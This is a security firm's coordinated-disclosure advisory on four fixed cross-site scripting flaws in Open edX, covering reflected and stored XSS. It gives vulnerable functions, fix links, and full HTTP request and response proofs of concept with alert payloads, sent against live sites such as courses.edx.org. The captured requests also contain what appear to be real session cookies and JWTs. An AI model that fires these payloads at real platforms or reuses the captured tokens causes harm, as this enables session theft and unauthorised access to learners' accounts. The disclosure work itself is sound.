ITAS SECURITY TEAM FOUND MULTI VULNERABILITIES ON OPEN EDX LEARNING PLATFORM
Itas Security Team has found several security gaps on Open EDX. Open EDX is an online education system developed by Harvard and MIT in 2012. It is used by many international organizations, including Microsoft, IBM, Harvard University, Stanford University, and other organizations. During our security testing for clients using the Open EDX system, ITAS Security Team has discovered a number of security vulnerabilities within the Open EDX source code (Hawthorn.2 released 06/29/2018). The vulnerabilities include Stored Cross Site Scripting and Reflected Cross Site Scripting. Hackers could take advantage of these vulnerabilities to attack users of Open EDX.
After the ITAS team notified EdX of the vulnerabilities, EdX examined the claim and acknowledged a total of 4 CAT-1 security issues. ITAS continued to aid in the repair process by pointing out remaining vulnerabilities a second time. To express their appreciation, EdX has offered the ITAS team $600 USD worth of rewards.
From EdX’s response to ITAS: ” Thank you so much for your hard work to make edx.org more secure for its millions of learners worldwide. As a non-profit opensource company we really appreciate you taking the time to find and disclose these issues to us directly. “
Cross Site Scripting, also known as XSS, is 7th in the top 10 2017 vulnerabilities according to OWASP. As a result of the XSS vulnerability, hackers could steal session of legitimate users to login application or interact with users’ browsers for further attack.
From our observation, we have found that all online education systems using the faulty version are vulnerable to attacks and exploitation, examples of which are listed below.
- https://courses.edx.org
- https://openedx.microsoft.com
- https://openedx.gse.harvard.edu
- https://lagunita.stanford.edu
- https://lms.mitx.mit.edu
- https://university.redislab.com
- https://openedx.open.ac.uk/
- https://campus.gov.il
- https://demo.edunext.io/
1. Application Information
Vendor : https://open.edx.org/
Download link: https://github.com/edx/edx-platform
Vulnerable version: Hawthorn.2
Fixed version: Ironwood.3
Release date: 2019-02-27
2. Vulnerabilities Information
a. Template – URL Cross Site Scripting
Vulnerability name: URL Cross Site Scripting
Affected URL : https://openedx-site.com/template/{PAYLOAD}
Parameter name :
Parameter Type : GET
Sample payload: <script>alert(‘XSS’)<script>
Condition to attack:
Vulnerable file: openedx/core/djangoapps/debug/views.py
Vulnerable function: show_reference_template
Fixed link: https://github.com/edx/edx-platform/pull/19615
Proof of concept
Request
GET /template/<script>alert(‘XSS’)</script> HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Response
HTTP/1.1 404 Not Found
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Dec 2018 09:03:38 GMT
Server: nginx
Vary: Accept-Encoding
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 46
Connection: Close
Missing template <script>alert(‘XSS’)</script>
Video (Demonstration in openedx.microsoft.com)
b. Xblock – Reflected Cross Site Scripting
Vulnerability name: Reflected Cross Site Scripting
Affected URL : https://courses.edx.org/xblock/{USAGE_ID}?view={PAYLOAD}
Parameter name : view
Parameter Type : GET
Sample payload: <script>alert(‘XSS’)<script>
Condition to attack:
Vulnerable file: lms/djangoapps/courseware/views/views.py
Vulnerable function: render_xblock
Fixed link: https://github.com/edx/edx-platform/pull/19517
Proof of concept
Request
GET /xblock/block-v1:edX+DemoX+Demo_Course+type@vertical+block@vertical?view=<script>alert(“XSS”)</script>
HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Response
HTTP/1.1 400 Bad Request
Cache-control: no-cache=”set-cookie”
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Dec 2018 09:15:49 GMT
Server: nginx
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A9FFA4D0509C04A79307C543BC7A564BF3102652C9DDBF45788A0111B01830935A583EAE591F65FD084E6693F1009EDC31;PATH=/;MAX-AGE=120
Vary: Accept-Language, Cookie
Content-Length: 78
Connection: Close
Rendering of the xblock view ‘<script>alert(‘XSS’)</script>’ is not supported.
Video (Demonstration in openedx.microsoft.com)
c. Certificate – Reflected Cross Site Scripting
Vulnerability name: Reflected Cross-site Scripting
Affected URL : http://openedx-site.com/certificates/search/?user={PAYLOAD}
Parameter name : user
Parameter Type : GET
Sample payload: <script>alert(‘XSS’)<script>
Condition to attack: Required staff role or higher
Vulnerable file: lms/djangoapps/certificates/views/support.py
Vulnerable function: search_certificates
Fixed link: https://github.com/edx/edx-platform/pull/19519
Proof of concept
Request
GET /certificates/search/?user=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1
Host: openedx.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: csrftoken=YexdtVBq17ovoP4JX4z0JVJprr7Jwt8m5ftnkPEztOkctN0BjVUMtWcDxcID3Fbc; experiments_is_enterprise=false; openedx-language-preference=en; edxloggedin=true; sessionid=”1|ud7b2zkplcv2zzrbkkk06wtkq6ced7tp|qtpnFD16krkG|IjQ2MTA5N2NmNGEwOWFkNjNjNzJjNDg1MGQ4NDE5MTc1YTNiYTAwYTYzYmQ2NDg0NjgwYWQ3NDk4OTVhNDFmYzQi:1gYpH7:wa4qHQbmWjRbERxcmREcFCezcec”; edx-user-info=”{\”username\”: \”staff\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”09d498ab1dd69884525f4cdfa9cca6a6\”\054 \”header_urls\”: {\”learner_profile\”: \”http://192.168.1.238/u/staff\”\054 \”resume_block\”: \”http://192.168.1.238/dashboard\”\054 \”logout\”: \”http://192.168.1.238/logout\”\054 \”account_settings\”: \”http://192.168.1.238/account/settings\”}}”
Upgrade-Insecure-Requests: 1
Response
HTTP/1.1 400 Bad Request
Server: nginx
Date: Mon, 17 Dec 2018 09:34:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 51
Connection: close
Vary: Accept-Language, Cookie
X-Frame-Options: ALLOW
Content-Language: en
Set-Cookie: openedx-language-preference=en; expires=Mon, 31-Dec-2018 09:34:29 GMT; Max-Age=1209600; Path=/
user ‘<script>alert(‘XSS’)</script>’ does not exist
Video (Demonstration in openedx.local)
d. Wiki – Stored Cross Site Scripting
Vulnerability name: Stored Cross Site Scripting
Affected URL : https://openedx-site.com/courses/{Course_id}/course_wiki
Parameter name : content
Parameter Type : POST
Sample payload: <script>alert(‘XSS’)<script>
Condition to attack: registered user
Vulnerable file: lms/djangoapps/course_wiki/views.py
Vulnerable function: course_wiki_redirect
Fixed link: https://github.com/edx/edx-platform/pull/20633/files
Step to reproduce : Login as student user and following the step below
Step 1: Access course wiki by adding course_wiki at the end of course URL (No matter that the course has a wiki or not. E.g: https://courses.edx.org/courses/course-v1:AdelaideX+ProgramX+3T2018/course_wiki)
Step 2: Click Edit button and put XSS payload(<script>alert(‘XSS’)</script>) into wiki content then save it.
Step 3: Payload popup on https://courses.edx.org/wiki/{Course-id}/ (E.g: https://courses.edx.org/wiki/course-v1:AdelaideX+ProgramX+3T2018/)
Proof of concept
Request 1
GET /courses/course-v1:AdelaideX+ProgramX+3T2018/course_wiki HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: __cfduid=dd721431718a63918f0bf0852e5ef08a61542883934; csrftoken=TfcOjleCHqbyXGJxLOPdkRTwsLD6iixrgr35L54daxwvAzYi7b1vw5lx9ocibtSw; optimizelyEndUserId=oeu1543736784624r0.18289740247694908; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%2233ce0d14-baab-4869-b1a2-0e550cc66925%22; ki_t=1543736796101%3B1543806787761%3B1543819835121%3B2%3B50; prod-edx-cookie-policy-viewed=true; experiments_is_enterprise=false; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; prod-edx-language-preference=en; prod-edx-csrftoken=vCmAAKia73Q0PvtiRSICwRGHQoBQ3Xbcph0MDeLZASiaQkWa8OaoSwROinyiDVl9; prod-edx-sessionid=”1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|LhDSMPmPeLXm|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1c1:CRVkyoeUJrFVDvv05frdTNMWZs0″; edxloggedin=true; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.eyJzY29wZXMiOiBbImVtYWlsIiwgInByb2ZpbGUiXSwgImFkbWluaXN0cmF0b3IiOiBmYWxzZSwgInByZWZlcnJlZF91c2VybmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAiZmlsdGVycyI6IFsidXNlcjptZSJdLCAiaWF0IjogMTU0NDM3MTYzMCwgInN1YiI6ICIxZmE2NjViMmRjNmYxZWQ3OGExNGQ0MjZmYjk0YjQ1YyIsICJmYW1pbHlfbmFtZSI6ICIiLCAiYXVkIjogInJpbm15YnllZG51YXc1cGhsaWRDb2NEdWRieWxiT2JEaWJKb2Rib3NnZXRzRWJhbGQ0IiwgImlzcyI6ICJodHRwczovL2NvdXJzZXMuZWR4Lm9yZy9vYXV0aDIiLCAiZW1haWxfdmVyaWZpZWQiOiB0cnVlLCAibmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAidmVyc2lvbiI6ICIxLjEuMCIsICJnaXZlbl9uYW1lIjogIiIsICJleHAiOiAxNTQ0Mzc1MjMwLCAiaXNfcmVzdHJpY3RlZCI6IGZhbHNlLCAiZW1haWwiOiAic3R1ZGVudGRlbW8xQG1haWxpbmF0b3IuY29tIn0; edx-jwt-cookie-signature=lqvrwBViGUEij8AKc8FlWd1oa99bDtNGkmVkuobGLhE43W6qrEg2IvfzojsZnFgQiqJ3Be2D4Xp93of_qdo0AwP8EvwMdDEukqxJ68dMgFxa7e7gfLbhnCiGPYpLfdEywCQk_UerlrkPgz3WXO8hORydaNwD-bpe_yRpamZHburWw4DYJZjYIYRVaiHHc6KcaERQQLphQrD0zghp4sbd-nCIOfQcMy9mjE80Aq5jQydPJXUAlFcxC14XlR8x63P8WEV5Y0mUkEpud6wm3TnK_8oE8aCXk8OepYs1qSAtLj2tuBdSlVwuGqMkHtyTSYBchYjOAkMCQ6098POiTsLKDg; edx-jwt-refresh-cookie=B36A3caqItGpd80pKcNJKeL9fv51Os; prod-edx-user-info=”{\”username\”: \”studentdemo1\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”02c23d94693a6636ea722152eab98136\”\054 \”header_urls\”: {\”learner_profile\”: \”https://courses.edx.org/u/studentdemo1\”\054 \”resume_block\”: \”https://courses.edx.org/dashboard\”\054 \”logout\”: \”https://courses.edx.org/logout\”\054 \”account_settings\”: \”https://courses.edx.org/account/settings\”}}”
Upgrade-Insecure-Requests: 1
Response 1
HTTP/1.1 302 Found
Cache-control: no-cache=”set-cookie”
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Sun, 09 Dec 2018 16:08:03 GMT
Location: /wiki/AdelaideX.Code101x.3T2015/
P3P: CP=”edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy”
Server: nginx
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Sun, 23-Dec-2018 16:08:03 GMT; Max-Age=1209600; Path=/
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A93C0FAA65DA3F08F760218CFB1EAA2596E2F643BD06A9A0A502731C115A29A9CB909D18A431441A942FF35DD4A76CC255;PATH=/;MAX-AGE=120
Strict-Transport-Security: max-age=3600
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 0
Connection: Close
Resquest 2
POST /wiki/AdelaideX.Code101x.3T2015/_edit/ HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://courses.edx.org/wiki/AdelaideX.Code101x.3T2015/_edit/
Content-Type: multipart/form-data; boundary=—————————112257516914770264881620708143
Content-Length: 954
DNT: 1
Connection: close
Cookie: __cfduid=dd721431718a63918f0bf0852e5ef08a61542883934; csrftoken=TfcOjleCHqbyXGJxLOPdkRTwsLD6iixrgr35L54daxwvAzYi7b1vw5lx9ocibtSw; optimizelyEndUserId=oeu1543736784624r0.18289740247694908; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%2233ce0d14-baab-4869-b1a2-0e550cc66925%22; ki_t=1543736796101%3B1543806787761%3B1543819835121%3B2%3B50; prod-edx-cookie-policy-viewed=true; experiments_is_enterprise=false; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; prod-edx-language-preference=en; prod-edx-csrftoken=vCmAAKia73Q0PvtiRSICwRGHQoBQ3Xbcph0MDeLZASiaQkWa8OaoSwROinyiDVl9; prod-edx-sessionid=”1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|LhDSMPmPeLXm|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1c1:CRVkyoeUJrFVDvv05frdTNMWZs0″; edxloggedin=true; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.eyJzY29wZXMiOiBbImVtYWlsIiwgInByb2ZpbGUiXSwgImFkbWluaXN0cmF0b3IiOiBmYWxzZSwgInByZWZlcnJlZF91c2VybmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAiZmlsdGVycyI6IFsidXNlcjptZSJdLCAiaWF0IjogMTU0NDM3MTYzMCwgInN1YiI6ICIxZmE2NjViMmRjNmYxZWQ3OGExNGQ0MjZmYjk0YjQ1YyIsICJmYW1pbHlfbmFtZSI6ICIiLCAiYXVkIjogInJpbm15YnllZG51YXc1cGhsaWRDb2NEdWRieWxiT2JEaWJKb2Rib3NnZXRzRWJhbGQ0IiwgImlzcyI6ICJodHRwczovL2NvdXJzZXMuZWR4Lm9yZy9vYXV0aDIiLCAiZW1haWxfdmVyaWZpZWQiOiB0cnVlLCAibmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAidmVyc2lvbiI6ICIxLjEuMCIsICJnaXZlbl9uYW1lIjogIiIsICJleHAiOiAxNTQ0Mzc1MjMwLCAiaXNfcmVzdHJpY3RlZCI6IGZhbHNlLCAiZW1haWwiOiAic3R1ZGVudGRlbW8xQG1haWxpbmF0b3IuY29tIn0; edx-jwt-cookie-signature=lqvrwBViGUEij8AKc8FlWd1oa99bDtNGkmVkuobGLhE43W6qrEg2IvfzojsZnFgQiqJ3Be2D4Xp93of_qdo0AwP8EvwMdDEukqxJ68dMgFxa7e7gfLbhnCiGPYpLfdEywCQk_UerlrkPgz3WXO8hORydaNwD-bpe_yRpamZHburWw4DYJZjYIYRVaiHHc6KcaERQQLphQrD0zghp4sbd-nCIOfQcMy9mjE80Aq5jQydPJXUAlFcxC14XlR8x63P8WEV5Y0mUkEpud6wm3TnK_8oE8aCXk8OepYs1qSAtLj2tuBdSlVwuGqMkHtyTSYBchYjOAkMCQ6098POiTsLKDg; edx-jwt-refresh-cookie=B36A3caqItGpd80pKcNJKeL9fv51Os; prod-edx-user-info=”{\”username\”: \”studentdemo1\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”02c23d94693a6636ea722152eab98136\”\054 \”header_urls\”: {\”learner_profile\”: \”https://courses.edx.org/u/studentdemo1\”\054 \”resume_block\”: \”https://courses.edx.org/dashboard\”\054 \”logout\”: \”https://courses.edx.org/logout\”\054 \”account_settings\”: \”https://courses.edx.org/account/settings\”}}”; AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A93C0FAA65DA3F08F760218CFB1EAA2596E2F643BD06A9A0A502731C115A29A9CB909D18A431441A942FF35DD4A76CC255
Upgrade-Insecure-Requests: 1
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”csrfmiddlewaretoken”
CK0hVpI1d4KR43siLr4ssdOe8sKg1y6GZWRyn9yCGb5OHWH37OgKErgfP5jsUJrL
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”title”
Programming for Data Science
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”content”
This is the wiki for **AdelaideX**’s _Programming for Data Science_.
<script>alert(‘XSS’)</script>
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”summary”
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”current_revision”
89992
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”save”
1
—————————–112257516914770264881620708143–
Response 2
HTTP/1.1 302 Found
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Sun, 09 Dec 2018 16:08:45 GMT
Location: /wiki/AdelaideX.Code101x.3T2015/
P3P: CP=”edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy”
Server: nginx
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Sun, 23-Dec-2018 16:08:45 GMT; Max-Age=1209600; Path=/
Set-Cookie: prod-edx-sessionid=”1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|EPbOgM6D4T9p|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1dN:kxL_2U1JA0cAvinLbyXEfZppkvY”; Domain=.edx.org; expires=Sun, 06-Jan-2019 16:08:45 GMT; httponly; Max-Age=2419200; Path=/; secure
Strict-Transport-Security: max-age=3600
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 0
Connection: Close
Request 3
GET /wiki/AdelaideX.Code101x.3T2015/ HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://courses.edx.org/wiki/AdelaideX.Code101x.3T2015/_edit/
DNT: 1
Connection: close
Cookie: prod-edx-sessionid=”1|7ahalk3pygy48xh6l70e6j4ia96n4zet|IkblSszTjSXs|ImI5Y2FjMmY2YjZhOTk0NGVhZjBhMmE4NDFkMDA0ZDYwNDRiZDk5OTcyZTgzNGEzZjBiYmQ2MzIxYTg1OTRkNjAi:1gWg0X:V-pHtUuxjSFjVnSWN2DHssjuAYI”; csrftoken=wrJd3S6iaVCkkHNEQVVqTUywZaLtftQCZcLZiHxOD1P6NqPO443rAJTU8RelRJps; __cfduid=de755c9ba6493ba36d514c937c9f5528b1544526347; optimizelyEndUserId=oeu1544526349200r0.564235344454921; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%22de57a2d3-488b-4ada-960a-c6af0997df5b%22; experiments_is_enterprise=false; ki_t=1544526815310%3B1544526815310%3B1544526855356%3B1%3B2; edxloggedin=true; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.eyJzY29wZXMiOiBbImVtYWlsIiwgInByb2ZpbGUiXSwgImFkbWluaXN0cmF0b3IiOiBmYWxzZSwgInByZWZlcnJlZF91c2VybmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAiZmlsdGVycyI6IFsidXNlcjptZSJdLCAiaWF0IjogMTU0NDUyNjgyNCwgInN1YiI6ICIxZmE2NjViMmRjNmYxZWQ3OGExNGQ0MjZmYjk0YjQ1YyIsICJmYW1pbHlfbmFtZSI6ICIiLCAiYXVkIjogInJpbm15YnllZG51YXc1cGhsaWRDb2NEdWRieWxiT2JEaWJKb2Rib3NnZXRzRWJhbGQ0IiwgImlzcyI6ICJodHRwczovL2NvdXJzZXMuZWR4Lm9yZy9vYXV0aDIiLCAiZW1haWxfdmVyaWZpZWQiOiB0cnVlLCAibmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAidmVyc2lvbiI6ICIxLjEuMCIsICJnaXZlbl9uYW1lIjogIiIsICJleHAiOiAxNTQ0NTMwNDI0LCAiaXNfcmVzdHJpY3RlZCI6IGZhbHNlLCAiZW1haWwiOiAic3R1ZGVudGRlbW8xQG1haWxpbmF0b3IuY29tIn0; edx-jwt-cookie-signature=kHy194pQ77QiK-gwvWsvIZvBvCHfRrJedvWHyS3SvONFx-ui8sXhZ2vZ0crVVjl-LHw9No30E_GSTmSOIiZ6Szu9MJm-0eFlOVLXziztwS7XcmfF8U2yBcLck40MuqlxLAIwAxjSDSbMNCJE0oKeNzUrFqUnTJuRYcqHmXiIHiK07hTQosEFMOXThirlJqTPFndnRUC3ZLHEsR6zlIcjW94hv_8VX3Ghf-nHGAq7t-E3b8EZgMOWw52vVKoL0xDLHSMphKVceX9w2GPzKSVUop3S5WK8yPJO3F5Zsjtj8F_ll7zeY-r-FTBqBo1MuRaQAdmQhCl0NIujNTsEEa-GKg; prod-edx-language-preference=en; edx-jwt-refresh-cookie=QplV797j5qcL5sqThFjeA4o8BwHQFN; prod-edx-user-info=”{\”username\”: \”studentdemo1\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”02c23d94693a6636ea722152eab98136\”\054 \”header_urls\”: {\”learner_profile\”: \”https://courses.edx.org/u/studentdemo1\”\054 \”resume_block\”: \”https://courses.edx.org/dashboard\”\054 \”logout\”: \”https://courses.edx.org/logout\”\054 \”account_settings\”: \”https://courses.edx.org/account/settings\”}}”; prod-edx-cookie-policy-viewed=true
Upgrade-Insecure-Requests: 1
Response 3
HTTP/1.1 200 OK
Cache-control: no-cache=”set-cookie”
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 11 Dec 2018 11:23:58 GMT
P3P: CP=”edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy”
Server: nginx
Set-Cookie: csrftoken=wrJd3S6iaVCkkHNEQVVqTUywZaLtftQCZcLZiHxOD1P6NqPO443rAJTU8RelRJps; expires=Tue, 10-Dec-2019 11:23:58 GMT; Max-Age=31449600; Path=/; secure
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Tue, 25-Dec-2018 11:23:58 GMT; Max-Age=1209600; Path=/
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A90749CECFD3E3A420861CE2F36D6BE86B832CBCF80A5BC96B29B65129A6F54A14F6993CFC88318D16B35C6A99B60FC936;PATH=/;MAX-AGE=120
Strict-Transport-Security: max-age=3600
Vary: Accept-Encoding
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 37551
Connection: Close
……….SNIPPET……….
<div class=”wiki-article”>
<p>This is the wiki for <strong>AdelaideX</strong>’s <em>Programming for Data Science</em>.
<script>alert(‘XSS’)</script></p>
</div>
……….SNIPPET……….
Video (Demonstration in demo.edunext.io)
The author is not responsible for any misuse of the information contained here in and accepts no responsibility for any damage caused by the use or misuse of this instructions. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
Information Disclosure
+ 25/12/2018: find security vulnerabilities
+ 26/12/2018: contact and send vulnerabilities to EDX Security Team
+ 15/01/2019: EDX Security Team confirm vulnerabilities
+ 18/01/2019: EDX releases fixed version.
+ 18/04/2019: public information